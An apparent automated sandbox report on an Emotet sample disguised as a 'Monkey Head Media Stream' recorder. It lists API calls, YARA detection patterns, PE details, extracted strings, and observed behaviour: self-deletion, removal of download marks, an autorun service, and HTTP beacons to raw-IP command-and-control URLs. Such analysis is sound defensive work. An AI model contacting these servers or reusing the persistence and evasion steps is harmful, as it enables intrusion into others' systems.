DynamicLoader: OLEAUT32.dll/BSTR_UserSize
DynamicLoader: OLEAUT32.dll/BSTR_UserMarshal
DynamicLoader: OLEAUT32.dll/BSTR_UserUnmarshal
DynamicLoader: OLEAUT32.dll/BSTR_UserFree
DynamicLoader: OLEAUT32.dll/VARIANT_UserSize
DynamicLoader: OLEAUT32.dll/VARIANT_UserMarshal
DynamicLoader: OLEAUT32.dll/VARIANT_UserUnmarshal
DynamicLoader: OLEAUT32.dll/VARIANT_UserFree
DynamicLoader: OLEAUT32.dll/LPSAFEARRAY_UserSize
DynamicLoader: OLEAUT32.dll/LPSAFEARRAY_UserMarshal
DynamicLoader: OLEAUT32.dll/LPSAFEARRAY_UserUnmarshal
DynamicLoader: OLEAUT32.dll/LPSAFEARRAY_UserFree
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: comctl32.dll/DPA_Create
DynamicLoader: comctl32.dll/DPA_InsertPtr
DynamicLoader: PROPSYS.dll/VariantToPropVariant
DynamicLoader: OLEAUT32.dll/
DynamicLoader: SSPICLI.DLL/GetUserNameExW
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: fxsst.dll/FaxMonitorStartup
DynamicLoader: slc.dll/SLGetWindowsInformationDWORD
DynamicLoader: ole32.dll/StringFromGUID2
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: fxsst.dll/IsFaxMessage
DynamicLoader: fxsst.dll/FaxMonitorShutdown
DynamicLoader: slc.dll/SLGetWindowsInformationDWORD
DynamicLoader: POWRPROF.dll/PowerSettingRegisterNotification
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
DynamicLoader: VERSION.dll/GetFileVersionInfoW
DynamicLoader: VERSION.dll/VerQueryValueW
DynamicLoader: ADVAPI32.dll/RegNotifyChangeKeyValue
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/QueryServiceStatus
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoSetProxyBlanket
DynamicLoader: OLEAUT32.dll/
DynamicLoader: Wlanapi.dll/WlanOpenHandle
DynamicLoader: OLEAUT32.dll/BSTR_UserUnmarshal64
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/QueryServiceConfigW
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: sechost.dll/QueryServiceStatus
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/RpcBindingSetOption
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcAsyncInitializeHandle
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: RPCRT4.dll/Ndr64AsyncClientCall
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/QueryServiceStatus
DynamicLoader: sechost.dll/QueryServiceConfigW
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: CRYPTBASE.dll/SystemFunction041
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegGetValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/IsValidSid
DynamicLoader: ADVAPI32.dll/GetLengthSid
DynamicLoader: ADVAPI32.dll/CopySid
DynamicLoader: SHELL32.dll/SHGetFolderPathW
DynamicLoader: SHELL32.dll/SHGetFolderPathEx
DynamicLoader: ntdll.dll/RtlDllShutdownInProgress
DynamicLoader: CRYPTBASE.dll/SystemFunction040
DynamicLoader: comctl32.dll/DPA_Create
DynamicLoader: comctl32.dll/DPA_Search
DynamicLoader: comctl32.dll/DPA_InsertPtr
DynamicLoader: WSCAPI.dll/WscGetSecurityProviderHealth
DynamicLoader: comctl32.dll/LoadIconMetric
DynamicLoader: WINTRUST.dll/DllCanUnloadNow
DynamicLoader: WINTRUST.dll/CryptSIPPutSignedDataMsg
DynamicLoader: pcwum.dll/PerfDeleteInstance
DynamicLoader: pcwum.dll/PerfStopProvider
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/WmiCloseBlock
DynamicLoader: PROPSYS.dll/PropVariantToVariant
DynamicLoader: ole32.dll/CoDisconnectObject
DynamicLoader: wbemcore.dll/Shutdown
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoDisconnectObject
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: ADVAPI32.dll/RegDeleteKeyExW
DynamicLoader: kernel32.dll/RegDeleteValueW
DynamicLoader: WTSAPI32.dll/WTSQueryUserToken
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoInitializeSecurity
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: wmisvc.dll/ServiceMain
DynamicLoader: wmisvc.dll/SvchostPushServiceGlobals
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: sechost.dll/RegisterServiceCtrlHandlerExW
DynamicLoader: sechost.dll/SetServiceStatus
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: ADVAPI32.dll/RegisterEventSourceW
DynamicLoader: ADVAPI32.dll/ReportEventW
DynamicLoader: ADVAPI32.dll/DeregisterEventSource
DynamicLoader: ADVAPI32.dll/WmiOpenBlock
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ole32.dll/CoGetPSClsid
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: ole32.dll/DcomChannelSetHResult
DynamicLoader: VSSAPI.DLL/CreateWriter
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ADVAPI32.dll/LookupAccountNameW
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: samcli.dll/NetLocalGroupGetMembers
DynamicLoader: SAMLIB.dll/SamConnect
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: SAMLIB.dll/SamOpenDomain
DynamicLoader: SAMLIB.dll/SamLookupNamesInDomain
DynamicLoader: SAMLIB.dll/SamOpenAlias
DynamicLoader: SAMLIB.dll/SamFreeMemory
DynamicLoader: SAMLIB.dll/SamCloseHandle
DynamicLoader: SAMLIB.dll/SamGetMembersInAlias
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/StringFromCLSID
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: PROPSYS.dll/VariantToPropVariant
DynamicLoader: OLEAUT32.dll/
DynamicLoader: wbemcore.dll/Reinitialize
DynamicLoader: wbemsvc.dll/DllGetClassObject
DynamicLoader: wbemsvc.dll/DllCanUnloadNow
DynamicLoader: authZ.dll/AuthzInitializeContextFromToken
DynamicLoader: authZ.dll/AuthzInitializeObjectAccessAuditEvent2
DynamicLoader: authZ.dll/AuthzAccessCheck
DynamicLoader: authZ.dll/AuthzFreeAuditEvent
DynamicLoader: authZ.dll/AuthzFreeContext
DynamicLoader: authZ.dll/AuthzInitializeResourceManager
DynamicLoader: authZ.dll/AuthzFreeResourceManager
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: RPCRT4.dll/RpcBindingCreateW
DynamicLoader: RPCRT4.dll/RpcBindingBind
DynamicLoader: RPCRT4.dll/I_RpcMapWin32Status
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: ADVAPI32.dll/EventRegister
DynamicLoader: ADVAPI32.dll/EventUnregister
DynamicLoader: ADVAPI32.dll/EventWrite
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: kernel32.dll/RegSetValueExW
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegQueryValueExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: wmisvc.dll/IsImproperShutdownDetected
DynamicLoader: Wevtapi.dll/EvtRender
DynamicLoader: Wevtapi.dll/EvtNext
DynamicLoader: Wevtapi.dll/EvtClose
DynamicLoader: Wevtapi.dll/EvtQuery
DynamicLoader: Wevtapi.dll/EvtCreateRenderContext
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/RpcBindingSetOption
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: ole32.dll/CoCreateFreeThreadedMarshaler
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CreateStreamOnHGlobal
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ADVAPI32.dll/RegCreateKeyExW
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: KERNELBASE.dll/InitializeAcl
DynamicLoader: KERNELBASE.dll/AddAce
DynamicLoader: sechost.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
DynamicLoader: kernel32.dll/IsThreadAFiber
DynamicLoader: kernel32.dll/OpenProcessToken
DynamicLoader: KERNELBASE.dll/GetTokenInformation
DynamicLoader: KERNELBASE.dll/DuplicateTokenEx
DynamicLoader: KERNELBASE.dll/AdjustTokenPrivileges
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: KERNELBASE.dll/AllocateAndInitializeSid
DynamicLoader: KERNELBASE.dll/CheckTokenMembership
DynamicLoader: kernel32.dll/SetThreadToken
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: ole32.dll/CLSIDFromString
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: authZ.dll/AuthzInitializeContextFromToken
DynamicLoader: authZ.dll/AuthzInitializeResourceManager
DynamicLoader: authZ.dll/AuthzInitializeContextFromSid
DynamicLoader: authZ.dll/AuthzInitializeContextFromToken
DynamicLoader: authZ.dll/AuthzAccessCheck
DynamicLoader: authZ.dll/AuthzFreeContext
DynamicLoader: authZ.dll/AuthzFreeResourceManager
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: ole32.dll/CoGetCallContext
DynamicLoader: ole32.dll/CoImpersonateClient
DynamicLoader: ADVAPI32.dll/OpenThreadToken
DynamicLoader: ole32.dll/CoRevertToSelf
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoSwitchCallContext
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: sechost.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
DynamicLoader: sechost.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: wbemcore.dll/Reinitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/RegCreateKeyExW
DynamicLoader: kernel32.dll/RegQueryValueExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: ntdll.dll/EtwRegisterTraceGuidsW
DynamicLoader: ntdll.dll/EtwRegisterTraceGuidsW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ole32.dll/CoGetPSClsid
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: ole32.dll/DcomChannelSetHResult
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: wbemsvc.dll/DllGetClassObject
DynamicLoader: wbemsvc.dll/DllCanUnloadNow
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: RPCRT4.dll/UuidFromStringW
DynamicLoader: radarrs.dll/WdiDiagnosticModuleMain
DynamicLoader: radarrs.dll/WdiHandleInstance
DynamicLoader: radarrs.dll/WdiGetDiagnosticModuleInterfaceVersion
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
Performs HTTP requests potentially not found in PCAP.
url: 125.99.61.162:7080/loadan/
CAPE extracted potentially suspicious content
ygg9ytft62s5ip.exe: Emotet Payload: 32-bit executable
ygg9ytft62s5ip.exe: YARA rule "Emotet" (cape_type: Emotet Payload, author: kevoreilly) matched two byte patterns, { 6A 13 68 01 00 01 00 FF 15 58 17 41 00 85 C0 } and { 33 C0 21 05 5C 39 41 00 A3 58 39 41 00 39 05 90 03 41 00 74 18 40 A3 58 39 41 00 83 3C C5 90 03 41 00 00 75 F0 51 E8 FD BE FF FF 59 C3 }, at addresses snippet2 = 5037 and snippet6 = 21716
ygg9ytft62s5ip.exe: Emotet Payload
HTTP traffic contains suspicious features which may be indicative of malware related traffic
ip_hostname: HTTP connection was made to an IP address rather than domain name
suspicious_request: http://91.83.93.105:8080/prov/guids/entries/merge/
suspicious_request: http://91.83.93.105:8080/window/raster/between/
suspicious_request: http://91.83.93.105:8080/balloon/balloon/
suspicious_request: http://91.83.93.105:8080/publish/
suspicious_request: http://91.83.93.105:8080/report/cookies/
suspicious_request: http://91.83.93.105:8080/prep/prov/enabled/merge/
suspicious_request: http://91.83.93.105:8080/loadan/
suspicious_request: http://91.83.93.105:8080/splash/splash/merge/
suspicious_request: http://91.83.93.105:8080/loadan/json/window/merge/
suspicious_request: http://91.83.93.105:8080/vermont/raster/scripts/merge/
suspicious_request: http://91.83.93.105:8080/window/ban/
suspicious_request: http://91.83.93.105:8080/window/merge/acquire/merge/
suspicious_request: http://91.83.93.105:8080/pnp/
Performs some HTTP requests
url: http://91.83.93.105:8080/prov/guids/entries/merge/
url: http://91.83.93.105:8080/window/raster/between/
url: http://91.83.93.105:8080/balloon/balloon/
url: http://91.83.93.105:8080/publish/
url: http://91.83.93.105:8080/report/cookies/
url: http://91.83.93.105:8080/prep/prov/enabled/merge/
url: http://91.83.93.105:8080/loadan/
url: http://91.83.93.105:8080/splash/splash/merge/
url: http://91.83.93.105:8080/loadan/json/window/merge/
url: http://91.83.93.105:8080/vermont/raster/scripts/merge/
url: http://91.83.93.105:8080/window/ban/
url: http://91.83.93.105:8080/window/merge/acquire/merge/
url: http://91.83.93.105:8080/pnp/
Deletes its original binary from disk
Attempts to remove evidence of file being downloaded from the Internet
file: C:\Windows\SysWOW64\prepmspterm.exe:Zone.Identifier
Installs itself for autorun at Windows startup
service name: prepmspterm
service path: "C:\Windows\SysWOW64\prepmspterm.exe"
Creates a hidden or system file
file: C:\Users\user\AppData\Local\Microsoft\Windows\Burn\Burn
CAPE detected the Emotet malware family
Creates a copy of itself
copy: C:\Windows\SysWOW64\prepmspterm.exe
Drops a binary and executes it
binary: C:\Windows\SysWOW64\prepmspterm.exe
Anomalous binary characteristics
anomaly: Actual checksum does not match that reported in PE header

Hosts

Direct IP Country Name
Y 94.183.71.206 [VT] Iran, Islamic Republic of
Y 91.83.93.105 [VT] Hungary
Y 125.99.61.162 [VT] India

DNS

No domains contacted.


Summary

PE Information

Image Base 0x00400000
Entry Point 0x00407dd3
Reported Checksum 0x0009e705
Actual Checksum 0x000a1768
Minimum OS Version 5.0
Compile Time 2019-10-06 18:27:14
Import Hash 8740bde339723d73ad60369c868b5940
Exported DLL Name MHMS.exe

Sections

Name Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00001000 0x000076e3 0x00007800 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.20
.rdata 0x00009000 0x000021bf 0x00002200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 5.35
.data 0x0000c000 0x000006c0 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 1.27
.rsrc 0x0000d000 0x0008e686 0x0008e800 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 4.63

Overlay

Offset 0x00098800
Size 0x00000003

Imports

Library COMCTL32.dll:
0x409000 None
0x409004 ImageList_Add
0x409008 ImageList_Create
Library COMDLG32.dll:
0x409014 GetSaveFileNameA
Library WS2_32.dll:
0x409264 send
0x409268 socket
0x40926c htons
0x409270 setsockopt
0x409274 connect
0x409278 WSAStartup
0x40927c WSAGetLastError
0x409280 gethostname
0x409284 gethostbyname
0x409288 inet_ntoa
0x40928c recv
0x409290 WSACleanup
0x409294 closesocket
Library KERNEL32.dll:
0x40904c Sleep
0x409054 GetModuleFileNameA
0x409058 FindClose
0x40905c FindFirstFileA
0x409060 GetDriveTypeA
0x409070 GetModuleHandleA
0x409074 GlobalReAlloc
0x409078 GlobalUnlock
0x40907c GlobalLock
0x409080 GlobalAlloc
0x409084 InterlockedExchange
0x40908c GetCurrentProcessId
0x409090 GetCurrentThreadId
0x409094 GetTickCount
0x40909c IsDebuggerPresent
0x4090a8 GetCurrentProcess
0x4090ac TerminateProcess
0x4090b0 GetStartupInfoA
Library USER32.dll:
0x4091c0 RegisterClassExA
0x4091c4 LoadCursorA
0x4091c8 LoadIconA
0x4091cc SendMessageA
0x4091d0 EnableWindow
0x4091d4 CreateWindowExA
0x4091d8 GetWindowRect
0x4091dc DestroyWindow
0x4091e0 SetWindowPos
0x4091e4 GetCursorPos
0x4091e8 ReleaseDC
0x4091ec GetDC
0x4091f0 LoadBitmapA
0x4091f4 CreatePopupMenu
0x4091f8 AppendMenuA
0x4091fc TrackPopupMenu
0x409200 LoadImageA
0x409204 SetWindowRgn
0x409208 CreateDialogParamA
0x40920c SetCursor
0x409210 BeginPaint
0x409214 EndPaint
0x409218 SetCapture
0x40921c GetClientRect
0x409220 ReleaseCapture
0x409224 CallWindowProcA
0x409228 SetWindowLongA
0x40922c MessageBoxA
0x409230 GetDlgItem
0x409234 SetFocus
0x409238 DefWindowProcA
0x40923c PostQuitMessage
0x409240 GetMessageA
0x409244 TranslateMessage
0x409248 DispatchMessageA
0x40924c IsDialogMessageA
0x409250 LoadStringW
0x409254 ShowWindow
0x409258 GetDesktopWindow
0x40925c SetRect
Library GDI32.dll:
0x40901c GetStockObject
0x409020 CreateDIBSection
0x409024 GetPixel
0x409028 ExtCreateRegion
0x40902c CombineRgn
0x409030 DeleteObject
0x409034 GetObjectA
0x409038 CreateCompatibleDC
0x40903c SelectObject
0x409040 DeleteDC
0x409044 BitBlt
Library SHELL32.dll:
0x4091b8 ShellExecuteA
Library MSVCR90.dll:
0x4090cc _decode_pointer
0x4090d0 _onexit
0x4090d4 _lock
0x4090d8 __dllonexit
0x4090dc _unlock
0x4090e0 _invoke_watson
0x4090e4 ?terminate@@YAXXZ
0x4090e8 _crt_debugger_hook
0x4090ec __set_app_type
0x4090f0 _encode_pointer
0x4090f4 __p__fmode
0x4090f8 __p__commode
0x4090fc _adjust_fdiv
0x409100 __setusermatherr
0x409104 _configthreadlocale
0x409108 _initterm_e
0x40910c _initterm
0x409110 _acmdln
0x409114 exit
0x409118 _ismbblead
0x40911c _XcptFilter
0x409120 _exit
0x409124 _cexit
0x409128 __getmainargs
0x40912c _amsg_exit
0x409130 _beginthread
0x409134 fwrite
0x409138 fflush
0x40913c _flushall
0x409140 _endthread
0x409144 __CxxFrameHandler3
0x409148 isdigit
0x40914c feof
0x409150 fgets
0x409154 strncmp
0x409158 atoi
0x40915c fprintf
0x409160 fopen
0x409164 _controlfp_s
0x409168 _itoa
0x409170 _stricmp
0x409174 strstr
0x409178 _splitpath
0x40917c ??3@YAXPAX@Z
0x409180 sprintf
0x409184 ??2@YAPAXI@Z
0x409188 atol
0x40918c memset
0x409190 fclose
0x409194 strerror
0x409198 _errno
0x40919c isspace
0x4091a0 _difftime64
0x4091a4 _time64
0x4091a8 memcpy
0x4091ac _wtoi
0x4091b0 _wcslwr

Exports

Ordinal Address Name
1 0x4034e0 Run
MHMS_Popup
MHMS_Main
Monkey Head Media Stream
bad allocation
%s%s%s
Item Count: %i
%s%s%s_%04i%s
config.ini
urlbookmarks
urlhistory.txt
help\
RECV_THROTTLE
RECV_MAX_BUFFER
TIMEOUT
WINSOCK
AGENT_NAME
TRACK_SEPERATION
WINDOW_ON_TOP
tooltips_class32
Host Unknown
Unspecified network error occurred!
Host not found!
Network subsystem is unavailable!
No route to host!
Host is unavailable!
Connection refused!
Connection timed out!
No buffer space available!
Connection reset by peer!
Software caused connection abort!
Network dropped connection on reset!
Network is unreachable!
Network is down!
Too many open sockets
Network Error:
%02d:%02d:%02d
StreamTitle='
Enter new bookmark information and click the 'Ok' button to save your information.
You must select an item to edit.
Update bookmark information and click the 'Ok' button to save your information.
Specify output filename:
*.mp3
All Files
Could not open help.chm
help.chm
Error! Failed to locate correct version of the Winsock DLL!
icy-notice2:
icy-notice1:
Content-Type:
icy-url:
icy-genre:
icy-name:
icy-br:
icy-metaint:
%s%sPartialTrack%s
%s%s%s%s
Failed to update bookmark!
You must select an item to delete.
Failed to delete list item!
Are you sure you wish to delete the "%s" item?
Are you sure you wish to delete the media stream URL history?
http://www.monkeyheadsoftware.com/default.asp?app=Y
You must specify a valid stream URL! ex, (http://www.somehost.com:8000/stream/1011)
You must specify a valid stream URL!
You must enter a stream name!
No bookmarks available.
You must select an item first.
A stream is currently being recorded. You must stop the current media stream before proceeding.
%s exists! Do you wish to overwrite this file?
%s exists. Do you wish to overwrite this file?
Invalid filepath! Ensure the specified directory exists!
You must specify a valid destination filename.
File:
Track:
Saved %iK Bytes in %s (hh:mm:ss)
Media stream stopped.
Connection Lost!
Failed to open MP3 file! Ensure all open media files are closed.
Specified number of recording minutes ellapsed.
Failed to open file " %s ". This file may be opened by another application.
Max number of bytes specified has been saved..
@ File Error! Ensure file is closed and check diskspace!
Display application information
Display help file
Application settings
Display bookmarks
Acquire media stream
Visit Monkey Head Software's Home Page!
Minimize window
Close Application
Stream acquisition cancelled!
Contact software provider if this issue persists.
Validate the specified URL or check your Internet connection.
Stream capture classes initialized..
Please wait.. Connecting to remote server..
Delete Bookmark
Edit Bookmark
Get Stream
Stream URL
Stream Name
http://www.monkeyheadsoftware.com?psc=Y
Status: Connecting to media server..
Failed to initialize application! Contact software prodiver if this condition persists!
Failed to load application configuration data! Check config.ini file! If your config file is corrupt, simply delete it and restart the application. The file will be recreated upon restart.
InitCommonControlsEx
ImageList_Add
ImageList_Create
COMCTL32.dll
GetSaveFileNameA
COMDLG32.dll
WS2_32.dll
GetModuleFileNameA
FindClose
FindFirstFileA
GetDriveTypeA
GetPrivateProfileStringA
GetPrivateProfileIntA
WritePrivateProfileStringA
GetModuleHandleA
GlobalReAlloc
GlobalUnlock
GlobalLock
GlobalAlloc
Sleep
KERNEL32.dll
RegisterClassExA
LoadCursorA
LoadIconA
SendMessageA
EnableWindow
CreateWindowExA
GetWindowRect
DestroyWindow
SetWindowPos
GetCursorPos
ReleaseDC
GetDC
SetRect
GetDesktopWindow
ShowWindow
LoadStringW
IsDialogMessageA
DispatchMessageA
TranslateMessage
GetMessageA
PostQuitMessage
DefWindowProcA
SetFocus
GetDlgItem
MessageBoxA
SetWindowLongA
CallWindowProcA
ReleaseCapture
GetClientRect
SetCapture
EndPaint
BeginPaint
SetCursor
CreateDialogParamA
SetWindowRgn
LoadImageA
TrackPopupMenu
AppendMenuA
CreatePopupMenu
LoadBitmapA
USER32.dll
BitBlt
DeleteDC
SelectObject
CreateCompatibleDC
GetObjectA
DeleteObject
CombineRgn
ExtCreateRegion
GetPixel
CreateDIBSection
GetStockObject
GDI32.dll
ShellExecuteA
SHELL32.dll
??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ
??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_WI@Z
??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ
MSVCP90.dll
strstr
_splitpath
??3@YAXPAX@Z
sprintf
??2@YAPAXI@Z
memset
fclose
strerror
_errno
isspace
_difftime64
_time64
memcpy
_wtoi
_wcslwr
fopen
fprintf
strncmp
fgets
isdigit
__CxxFrameHandler3
_endthread
_flushall
fflush
fwrite
_beginthread
MSVCR90.dll
_amsg_exit
__getmainargs
_cexit
_exit
_XcptFilter
_ismbblead
_acmdln
_initterm
_initterm_e
_configthreadlocale
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
_encode_pointer
__set_app_type
_crt_debugger_hook
?terminate@@YAXXZ
?_type_info_dtor_internal_method@type_info@@QAEXXZ
_unlock
__dllonexit
_lock
_onexit
_decode_pointer
_except_handler4_common
_invoke_watson
_controlfp_s
InterlockedExchange
InterlockedCompareExchange
GetStartupInfoA
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
QueryPerformanceCounter
GetTickCount
GetCurrentThreadId
GetCurrentProcessId
GetSystemTimeAsFileTime
_itoa
_stricmp
MHMS.exe
.?AVCGuiElement@@
.?AVtype_info@@
</assembly>
MS Sans Serif
MS Sans Serif
Media stream &URL:
Destination File&path:
&Browse..
Max &Filesize (Mb):
msctls_updown32
Spin1
&Max Minutes:
msctls_updown32
Spin1
&Stop Stream
&Get Stream
